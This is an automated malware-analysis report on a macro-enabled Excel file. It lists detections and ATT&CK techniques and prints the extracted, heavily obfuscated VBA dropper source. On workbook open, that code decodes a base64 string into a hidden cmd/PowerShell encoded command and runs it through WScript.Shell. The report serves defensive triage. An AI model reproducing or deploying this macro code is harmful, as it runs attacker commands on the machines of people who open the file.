Verdict: MALICIOUS
Risk Score: 248
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The file is an Office document containing VBA macros, specifically a Workbook_Open macro, which is a common technique for initial execution. Heuristics indicate the use of WScript.Shell and CreateObject, suggesting the VBA code attempts to run external commands or download additional content. The VBA code is heavily obfuscated, making it difficult to determine the exact payload, but the presence of these indicators strongly suggests a downloader or dropper functionality.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6338232-0 | critical | CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Dropper.Agent-6338232-0
- VBA project inside OOXML | medium | 4 related findings | OOXML_VBA
  Document contains a VBA project — VBA macros present
- WScript.Shell usage | critical | OLE_VBA_WSCRIPT
  WScript.Shell usage. Matched line in script:
    End If
    kCitKTKpVfVvVUqhKYZfLTiHvaitBwnClsHybTQqDYfRpLgfcIlkopqRTaykkRnYsTKcNsFqIibmnQSjtCRsLCOvBpfBVgFmlGZWBDSkDucFO = "WSCript.shell"
    If False Then
- CreateObject call | high | OLE_VBA_CREATEOBJ
  CreateObject call. Matched line in script:
    Set EiPteTkFRMtuXZNGLUWwiMKOLluPZxJRMKhUKvObEiCwmBXgOclCQLrrYAitZUgTCbiMrswPGurAKNbJONBxLHBATqwJNUC = CreateObject(kCitKTKpVfVvVUqhKYZfLTiHvaitBwnClsHybTQqDYfRpLgfcIlkopqRTaykkRnYsTKcNsFqIibmnQSjtCRsLCOvBpfBVgFmlGZWBDSkDucFO)
    If False Then
- VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Workbook_Open macro | low | OLE_VBA_WBOPEN
  Workbook_Open macro. Matched line in script:
    Attribute VB_Customizable = True
    Private Sub Workbook_Open()
- Suspicious extracted artifact | medium | EXTRACTED_FILE_STATIC_TRIAGE
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 14776 bytes |

SHA-256: dfdbc9d4fa0ca86d8129325187cf174617084546a957f66dd5979b47284b3690
Detection (ClamAV): No threats found
Obfuscation or payload: likely
146 of 175 identifiers look randomly generated (e.g. 'AGPDzFbAFSRWnKocxbhKgPGJbpcJYUurlEfQFVSA') — consistent with name-mangling obfuscation. Carved artifact contains 4 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
zSTckmgCPIvHcuU.abUkRcqd
If False Then
Dim PKYPkDKPkpdmbjsNPqLLSDpqzvfuXfsYPPDbtLsk
ElseIf False Then
Dim evFKaFTJWkmFbPVLViPoXPsFwFWMfRUD
End If
If False Then
Dim xahWyfQtcVYntmwAtsGLwDMPDANViHdEPi
ElseIf False Then
Dim HAiyNqSVMBrFMKIVSnLIHuORTxRuLVsTXKfwSufQtarLXyoDNNoqtG
End If
If False Then
Dim aNmQfPYXKrJYhBeMDXIvPhDDuUJOhxgCZQkSJC
ElseIf False Then
Dim OPrVPAByQnYBKQhyrtKjVLGKqMKHyRRMCA
End If
If False Then
Dim JtDuSCBvEWpgnQUbZqIZgDIhfCpuAyWLyJHouwbHiaGkUKZtmXsaEdTFkW
ElseIf False Then
Dim PPNHvFzdheIfhcPArGwYMVdwHcGwHVpBEXhLuaeBkrcvkHqQKDlNILK
End If
If False Then
Dim tmQATzDWLoHaKuEGQcvnVsiLzmpmDjcttMnYdaL
ElseIf False Then
Dim CgUQGdggVFwVkNXpBEFAgJRScLOhxGfdpQtGAbbhSGUgGOsfV
End If
If False Then
Dim WmUXaesPCouPziOZTfTUQpZcYhapkLNTiMaULGPmArymhRTXFGnjYKEhMry
ElseIf False Then
Dim sDDeqbahnHuOMQhTZqnvHODjeYevXHtITHWiw
End If
If False Then
Dim NILGkgPLsaSqqfqZwreAUARxfJgOmvFuyXMiboWinYlxLEgbCjWQrhc
ElseIf False Then
Dim MqObaABZwVYsTTHxHUwNvOUlacELCYpCRuzrMNwimzobnMNIulPvvU
End If
If False Then
Dim hxWdAyvpWYgVaZTPluYOawasyOPvQRJtHwNBVjMymwdQvRlnoeAVXgtkXe
ElseIf False Then
Dim fmiAYEOnNdMRuBhacdTJwgcbHlRoWbDceqEaPmYYBIEHbWkynwEPROiyK
End If
If False Then
Dim GsmnaQmajnDxHLpFuHocUAkBSAZWnKQIFPItllbrRhrigBglOKXGtWqGI
ElseIf False Then
Dim lUZqQnZXvrrCwTJgwKnIBVQToHdnJPiZBlAQBAAu
End If
If False Then
Dim SKlKpiSqNZwLDxGPDFCIKlNgIRALStevKspqkGeFpmakSWWEekMw
ElseIf False Then
Dim yskhwEBXiGYUuABKIPfxbwTXLdOmvwgihi
End If
If False Then
Dim xRIIufFGXiOFpRUMvOEPUBYMWTqPclZqnMDjBz
ElseIf False Then
Dim VArUZlJFoxRjASdRNvtwmaoqelIYSdN
End If
If False Then
Dim lKwtEXAbnCRftxskHMVyHqFNuLApoclmKjgYEYZuNTFtUvvslAAL
ElseIf False Then
Dim xfFuFiysWKnKQeUKRUginbknkLszQIDnbapfdlTWagXCg
End If
If False Then
Dim vdqblaRURXWuSKupzbOHAjqpoggBKIHDh
ElseIf False Then
Dim HphCXfhmTJDSlLbYgaEIvfLnAnEuQKJQSMKUMncwhVhZmWCVEcdhCvlbduB
End If
If False Then
Dim kamVJAmAYAGMtyHbaymAekjpngbNXbiq
ElseIf False Then
Dim RlrWuzYZzVeUxQkjuTLdruXzrwhcZZdxSQuHGlgbaNAIGOsXwr
End If
If False Then
Dim TDPFzXNrexRvzasgChVccImjCetPtcEJghFZhMQWuOGjJeNaPZ
ElseIf False Then
Dim MKCTPKQfCUexyCtHPSUSzpQyiNBDaYQTAUPtHMRvJBKwswQEpBPuFxaX
End If
If False Then
Dim uDlBINFeDLxdnzACAZJxeUGlwxNYIVNCuszDbQmvvgsgyn
ElseIf False Then
Dim RpBNugncsZwzFLzhVhxuiuAwbkmNBxcanIgXXvbhPSzaG
End If
If False Then
Dim bKbvOLKiDEWpElKtZauwWMwebJZGPfQvapzZLRmmSrkEJiSJRopr
ElseIf False Then
Dim EdkPOwUFlDTXobPPlkiHoIefbsUtrQpbqZqxFkLOxhBOYMPi
End If
If False Then
Dim SDXhGhCwyEnVcaOUOrhPkSJBYTKGGPHPclansHVIWuyAwpmWTgAge
ElseIf False Then
Dim AyAtWImXwpixXtqAacGWYspTJEihnnaPbkbnZtWyi
End If
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "zSTckmgCPIvHcuU"
Public Sub abUkRcqd()
YwudsOnbRJzUF.lSacnoLqzErutPxBvnbn
If False Then
Dim laFPDZwvVsEtJGIJgkRaEjIPTWnRDagFHomSkEFf
ElseIf False Then
Dim llRuVWReTdtIEYdCRpwhlfsvLzlVTp
End If
If False Then
Dim YcfmoTRNtxEIxZhXAjKkAuIYtFsWiWkvLeEQdSkKlEvycdiTNoyCLi
ElseIf False Then
Dim peUGsiaueXMIxTUQthyzzwyJvQXZJuY
End If
If False Then
Dim hkcoawXaBkqZYmUfPzwuQDMjsfKLcLBlkzeYUet
ElseIf False Then
Dim TWHxOJXaXbkHaMAHeYtwvlMyqjEoZHv
End If
If False Then
Dim LlFcXJGxaVFnjrDaZjrAAaiyiKJGfEiAPfYWUjdyYaTapxcGnIeFhGvkDG
ElseIf False Then
Dim uMzzRVmEXESgGqGtcZHHIkiCTWZcTJjoTNoQyYIynlZXnGCozoeWdvyKe
End If
If False Then
Dim wfvvKlOUeMsCpuDQJTXKKOMUldeeNLXPdl
ElseIf False Then
Dim BsNCdzLDJtKmJtbGUbbAUhTaJgGkHTocYDsK
End If
If False Then
Dim CGqXzGFSKzTlCHrwodRUZmtxtavqEhOGARDNlDBNc
ElseIf False Then
Dim AQKNVhAcsnumYkPMtdYLONckNklDdKkcDrZWijXs
End If
If False Then
Dim vOMtTTcgnAsZcCNmnZzkwwyhDSigLteJFgQABjRtIEPcSKA
ElseIf False Then
Dim BemiJknvyPeqBlvVuWjTvmNlEIGcrgWPsRhCYKUYSkRkXsPINiVFj
End If
End Sub
Attribute VB_Name = "YwudsOnbRJzUF"
Sub lSacnoLqzErutPxBvnbn()
On Error Resume Next
If False Then
Dim UlmxxUFYDHDlCHrlDgZweGBkxhReXzLPEKEMBhEglkU
ElseIf False Then
Dim EQRcqgpcARwoNjBzPDaBDvogrCfjVcsL
End If
If False Then
Dim ulwUfEbxhXKxHWrczhpdKiRJclknAFGYZlubmhTKcdT
ElseIf False Then
Dim gkqYVLDkomOALUnruUowbQmYWcPpRNeBhPkYmMObxVSmK
End If
qEPRBeBeLDRtOyjEtxjCKBLUcNLsxOJLQgBNRlWfTuHgArIufEUllDZptvpnTIgwuGcixWmHa = 0
If False Then
Dim kiGzpYqogrPyRCtvOSaHNSwkOFiFMzGyAOlt
ElseIf False Then
Dim JqcooNBXUaUJUgjCsewSmWkjqkbhlRy
End If
If False Then
Dim DQAmYqlTARYPolYkgPDGVRTHnFsyDlUlDcRtUtLMHKwANG
ElseIf False Then
Dim vyRAvRiKcmxsySymPOxnMMTfPmEqzLUSuhJthDqCDtzevbusOUvhD
End If
Dim EiPteTkFRMtuXZNGLUWwiMKOLluPZxJRMKhUKvObEiCwmBXgOclCQLrrYAitZUgTCbiMrswPGurAKNbJONBxLHBATqwJNUC
If False Then
Dim atjelkINrKRReyRIEFMYvjTMpkorLcfPmPTnaOvShoMiiNR
ElseIf False Then
Dim cckJPiJHqaWpBwQCOfBfOfeiqJurGWkebSLObSP
End If
If False Then
Dim hdIcMDYtVQmxCghCxyBTFoSBTpsNilCbvQUBGCRfRQZaTZixtQNQZzKsLG
ElseIf False Then
Dim JXLKLkOLBmMgwvgWBpPriuGuTSXlBwFbq
End If
kCitKTKpVfVvVUqhKYZfLTiHvaitBwnClsHybTQqDYfRpLgfcIlkopqRTaykkRnYsTKcNsFqIibmnQSjtCRsLCOvBpfBVgFmlGZWBDSkDucFO = "WSCript.shell"
If False Then
Dim ztuTGFoMIXwlNTSjDyUdTYOQQqsMcJFgkpwCmCukafZXKIGzEByxlyWbeeC
ElseIf False Then
Dim QMcjyRPBYWQxADkDoyrFHksHbLIvlS
End If
If False Then
Dim VXIzeXyvbFvHhcoDxuAvicnYufTUImJUPFBspAZMEsXlKACQSXNNu
ElseIf False Then
Dim qksjjFyDdnowasbavNxVoqpFCOucDBlYvaYVJJGvaIbFiokH
End If
Set EiPteTkFRMtuXZNGLUWwiMKOLluPZxJRMKhUKvObEiCwmBXgOclCQLrrYAitZUgTCbiMrswPGurAKNbJONBxLHBATqwJNUC = CreateObject(kCitKTKpVfVvVUqhKYZfLTiHvaitBwnClsHybTQqDYfRpLgfcIlkopqRTaykkRnYsTKcNsFqIibmnQSjtCRsLCOvBpfBVgFmlGZWBDSkDucFO)
If False Then
Dim bqXJQsFAumhVKWAbCPAzTGRmHBvfOjXNdnBMebIDUYaWbllDIADSnknUZkB
ElseIf False Then
Dim OxalKPTrXVnwaHxfvfuKWQrXOgFatzgnuatFunQHItOiUDdKpEsp
End If
If False Then
Dim eZfyGCXeJtxXozBzOslHPmCcCIDKCukpHrJVvvzrQlxOwquUBdw
ElseIf False Then
Dim xTkZsXCvxzMbPJIQwqgETsurdongLOiIZxmWWRQy
End If
qtT = ""
If False Then
Dim szCrDKiFoaydVYdEYswDjWkjREBRWmteZ
ElseIf False Then
Dim iMUqDoSGhslQEnAUhxeVNOWPSZzIQjCgT
End If
If False Then
Dim EmMJOVEdxBdyTMQAxooPIMUpFXdoKpyqFwABoKT
ElseIf False Then
Dim cZsQMsQzNiHTuNRKsRWEqrPTHDnsWMP
End If
qtT = qtT & "YwBtAGQAIAAmACAALwBLACAAQwBEACAAQwA6ACAAJgAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgAGQAQQBCAHkAQQBIAGsAQQBlAHcAQgByAEEARwBrAEEAYgBBAEIAcwBBAEMAQQBBAEwAUQBCAHcAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYwB3AEIAegBBAEcANABBAFkAUQBCAHQAQQBHAFUAQQBJAEEAQgBGAEEARgBnAEEAUQB3AEIARgBBAEUAdwBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEARgBNAEEAZQBRAEIAegBBAEgAUQBBAFoAUQBCAHQAQQBDADQAQQBUAGcAQgBsAEEASABRAEEATABnAEIAWABBAEcAVQBBAFkAZwBCAEQAQQBHAHcAQQBhAFEAQgBsAEEARwA0AEEAZABBAEEAcABBAEMANABBAFIAQQBCAHYAQQBIAGMAQQBiAGcAQgBzAEEARwA4AEEAWQBRAEIAawBBAEUAWQBBAGEAUQBCAHMAQQBHAFUAQQBLAE"
If False Then
Dim MmVMpQwHxoYQFCWEcomHjSGckKYIJFXdAT
ElseIf False Then
Dim vgYBbtwKZQSbJRlyKEkEftgsbfrnxsQuPmGqfbMsL
End If
If False Then
Dim ZtpKIAHWLuTswnCzgZwBIMhAXMXKvSjrssGAriTekQmx
ElseIf False Then
Dim wBTyEqzBQqDMMpmwcwbsKbADhBIxGRR
End If
qtT = qtT & "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"
If False Then
Dim rZjDVsZGESibBptoBvWCnpunVAQQCiBvzYMncmQDDpWZ
ElseIf False Then
Dim bAzOnNGCjOeBfvhUcJEVRnbccGLPeTzxSULVBBcoczLkuKHh
End If
If False Then
Dim EvatlBIoZWlgCrXPPgjLjMTagPtRbqiSzeKisFMRLXvfQvmkbv
ElseIf False Then
Dim VNbvxsczNVIqNinShXhoXKURzMQnKkdIqfVUrDgRFsrqJVKNrxOO
End If
qtT = qtT & "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"
If False Then
Dim DmYKtJwkbopdszAhNTberPieTdIdCDwMVOEDGKbhHwqRDNyJVcAYW
ElseIf False Then
Dim kXoDurPASiYscIdvwaCrtWvZRaFfzIZDYq
End If
If False Then
Dim lrQzMSLhoNRYaFUNYBxgcNcOlTlkBJIVUmWmexOjgMihHtA
ElseIf False Then
Dim AKlkXFrNYPBNsgbfeFwEniijbnNzPeuGsTlZPZkPcZyXdjVCFhDcLoM
End If
qtT = qtT & "BBAEgATQBBAEoAdwBBAHAAQQBDAHMAQQBKAHcAQgBjAEEARwBrAEEAZABBAEIAbgBBAEcAWQBBAGQAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASwBRAEEANwBBAEgAMABBAFkAdwBCAGgAQQBIAFEAQQBZAHcAQgBvAEEAQwBBAEEAZQB3AEIAOQBBAEEAPQA9AA=="
If False Then
Dim RcCJksrxtUuUYvBPFUhcOjKGsRKuibSvEHTxNQAWkbF
ElseIf False Then
Dim DiOwHDRyIeMxhRwQSixORCzQRbDBpTKsneHXdUCqRdJRsJlf
End If
If False Then
Dim RzhonMnAixfgAPIoTUKDJYnyfGxosh
ElseIf False Then
Dim YIpXkpmVFaqGpfpWqCUVxXyiWtMiJgPzIAZWqcfS
End If
If False Then
Dim BxPjNDiHJIQvTWkAJHBqdDMYLqyoGSgNXBTzIPVSKFZAQTflQZNja
ElseIf False Then
Dim opylqXWFuAqcCYRCkrumigYdLIsLMXhFwniMVOSryNPEjYOvNighS
End If
If False Then
Dim xsHQUZifLsXTlfPpFhVZDnVQUunuwxdqzmz
ElseIf False Then
Dim vbwBojLnVslyszFIBLIPJWrwZmoiOPgTyfUOJfgprzAXiwuvrobfrWpYk
End If
EiPteTkFRMtuXZNGLUWwiMKOLluPZxJRMKhUKvObEiCwmBXgOclCQLrrYAitZUgTCbiMrswPGurAKNbJONBxLHBATqwJNUC.Run jiannfNEANPCyftFxeZxofBBqJYLTCfyYbfh(qtT), qEPRBeBeLDRtOyjEtxjCKBLUcNLsxOJLQgBNRlWfTuHgArIufEUllDZptvpnTIgwuGcixWmHa
If False Then
Dim zcCvcZFMSzNerzWeSYKWTNcrtrZnAbbpveJCduPauLQxh
ElseIf False Then
Dim QzpEAZyfBQlAKCkzRLqXXiNpTAXIjcIxfKdskiABdJuN
End If
If False Then
Dim YCTseaczZZJhmzkzBpwYIoUzYsPiLpuNozRRhf
ElseIf False Then
Dim dJzJXFBwFlyAznNWFjhTTmKtnkfvsmhTRWLmYy
End If
End Sub
Function jiannfNEANPCyftFxeZxofBBqJYLTCfyYbfh(sgEgPnUKVPopPVSVvWDlQXcDqfsFezvQXIwEGIARCqLwWtoiuetfNYCVEBqjvPfWUYRGYOOmWljaMfgwrJK)
If False Then
Dim QPycmekLpGzRuhjOMryFVnZFDSDeidbbxGTSUqzgJcuZwb
ElseIf False Then
Dim szjDJUnSdcpsZTaGcMeYUnORtVrRws
End If
If False Then
Dim tAJcaEufTHnedqcbRgGCzhuXGFkSJocVWkjpjxtVLxsXkpKXpSEL
ElseIf False Then
Dim LttLGlVVTcVffRIsHnsTmkrCpXmRuMdrkRKcrXjxcYBjbNs
End If
AGPDzFbAFSRWnKocxbhKgPGJbpcJYUurlEfQFVSAwNJUEOvQXDiUJzelzFbJdSckYZkjeYWcIgNSFlEMuMlUlZhmZuQztIXelYwfdLlygGLdlMfNA = "Microsoft.XMLDOM"
If False Then
Dim ThRQBZkYaCqWiyDaGyeuNGfBjDurOjHabfTkcwbR
ElseIf False Then
Dim AskZABAzYxukwTeMBQgxfsJrvQuDfTxKXNuVWFAhDvSRoWdIAHiLPdlHis
End If
If False Then
Dim ekGwUEzkNjYIpvQyukZsCYmmCXklutb
ElseIf False Then
Dim nndbQbHaOREItjsRnvQjBhqpGxUtwUNpTIlVLUzX
End If
Dim EdCIOqiAvNpFObXNDVcdoBgrwiqkgoQaJhxMctGpXmqtkQmcuWzZAbZCxLMgAyTGwOwgdLkKOm
If False Then
Dim nJLayPsCKGxqeKZGwnUSGNeuDOplyWFTvsvsVPrqFSipWXKIifYXz
ElseIf False Then
Dim hRZeRXkaHDoAdulPhkhwdNoeoXfDgCTyhUOaWNDrGQ
End If
If False Then
Dim yOuotdYtBuqbVUduqurgtEjqTJfKsThppNPZjzeCe
ElseIf False Then
Dim mBZHGyuxbXIAaXteEVjxOAhNAlIFEKqQpBGCKiMLlNRwYpPqVufduEQ
End If
Dim GBLmGfvOpJprahHuORgaoZTjxVUGyjmoKNVYrKEglmIJQEoPZjwSeoxgibplLpPFXAhMLjDENzpCQKT
If False Then
Dim lTMGVqotQgsLZQrUWJYMAjkpLVSkJfMVkkUiycrVxUBQfd
ElseIf False Then
Dim qZeZJUWsQCjWuzYEjkTWaovIWtSCPgiUJifsGjWrzsUS
End If
If False Then
Dim zbhrxskQwJCCdWDPCTdjUONMTfyzNbXiTdIuMaF
ElseIf False Then
Dim WvRYzfdOjgHpfPlykOUXRtlCUmUiANJCcNGnCqNhqQOTGmrShfXgsCocKP
End If
Set EdCIOqiAvNpFObXNDVcdoBgrwiqkgoQaJhxMctGpXmqtkQmcuWzZAbZCxLMgAyTGwOwgdLkKOm = CreateObject(AGPDzFbAFSRWnKocxbhKgPGJbpcJYUurlEfQFVSAwNJUEOvQXDiUJzelzFbJdSckYZkjeYWcIgNSFlEMuMlUlZhmZuQztIXelYwfdLlygGLdlMfNA)
If False Then
Dim DNLuOWWENRIxvtAnhBfSwhuBBUpdKZZddnnzWvBswBZaJkje
ElseIf False Then
Dim fEUnxsSVTJttgtunsfTIGARmznVuIUrQkLx
End If
If False Then
Dim FEmglURgMBHLCHlieQbXeninKWYNyRdJVwojFyh
ElseIf False Then
Dim npUEkrbSnXmMzInSRWyWPwDiuYyqGSCcgjoiKjxwiDkqMEdAheXMGcS
End If
Set GBLmGfvOpJprahHuORgaoZTjxVUGyjmoKNVYrKEglmIJQEoPZjwSeoxgibplLpPFXAhMLjDENzpCQKT = EdCIOqiAvNpFObXNDVcdoBgrwiqkgoQaJhxMctGpXmqtkQmcuWzZAbZCxLMgAyTGwOwgdLkKOm.createElement("OPRgHzyryKkHXiAJighpZ")
If False Then
Dim rllKLslMVVKgQUFHiYCoLLNVpvyIcvpVEQxwYZlDwr
ElseIf False Then
Dim PVCYNfbWonEoHfYPUQucjZfoczXIiJmyrTwsTRhSgFGBQQJRYIEUJTIppN
End If
If False Then
Dim vNHTofBGwnjfwCjbwdTeYMqFjZERoXLGCGV
ElseIf False Then
Dim ULNRbAJTVitMCliXeWLpjXBjObjSZcccphOQiMsd
End If
GBLmGfvOpJprahHuORgaoZTjxVUGyjmoKNVYrKEglmIJQEoPZjwSeoxgibplLpPFXAhMLjDENzpCQKT.DataType = "bin.base" & "64"
If False Then
Dim OsUXqMCfFzhkrRmwJeDARqutFQXUWSpReiaqDesBYDMZvslYuSGD
ElseIf False Then
Dim IrLXybRaphInKPFJqwsemBbOdVxNfzaELlImWDrc
End If
If False Then
Dim MRMruZOfmchyZbRHQxtddEvpHEcZGTnnEQSUpkUEGRaCRb
ElseIf False Then
Dim ejTBVYJNzIWWkpxpZTpuuJJxRgdpXLdsYfZsFExO
End If
GBLmGfvOpJprahHuORgaoZTjxVUGyjmoKNVYrKEglmIJQEoPZjwSeoxgibplLpPFXAhMLjDENzpCQKT.Text = sgEgPnUKVPopPVSVvWDlQXcDqfsFezvQXIwEGIARCqLwWtoiuetfNYCVEBqjvPfWUYRGYOOmWljaMfgwrJK
If False Then
Dim eqRJxSzeGRsHNXhVZWjpvTqneexEPEkUVaQErAzygyiGSWeByESiUISKz
ElseIf False Then
Dim deTUvPBgXmnHdeZXkIxlkVIzwGLmBzMHFEOVgdligZ
End If
If False Then
Dim vkrtVatKjzVZPIVTXoEPfXZfBYPDrHXOELZYIDlksqPNmg
ElseIf False Then
Dim pFzMFxeRtXKLswKqTccHUDixKUCTXoHLtUjKDeBajnRBNwKpa
End If
jiannfNEANPCyftFxeZxofBBqJYLTCfyYbfh = GBLmGfvOpJprahHuORgaoZTjxVUGyjmoKNVYrKEglmIJQEoPZjwSeoxgibplLpPFXAhMLjDENzpCQKT.NodeTypedValue
If False Then
Dim CWmlfMlWCCluLtFQzSXMAmpbCXhmgkNJN
ElseIf False Then
Dim sVRUaNIxnBbPfYtLlOencaPhLiHezpSobgT
End If
If False Then
Dim YnvYEPOMkOLWznavVjWkRFkJrGdyxjnozEVXqqZXNNeSz
ElseIf False Then
Dim MIrYuwEEvBSDmgylQPBaXWuRCFfKzXEaRKfxlaCmikD
End If
End Function

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 46592 bytes |

SHA-256: 64e2d8f6b331880c2e84fb67c88d170dc70b48d97fd29da0c05a6abf355b5414
Detection (ClamAV): No threats found
Obfuscation or payload: likely
813 of 1063 identifiers look randomly generated (e.g. 'AGPDzFbAFSRWnKocxbhKgPGJbpcJYUurlEfQFVSA') — consistent with name-mangling obfuscation. Carved artifact contains 4 long base64-like blob(s).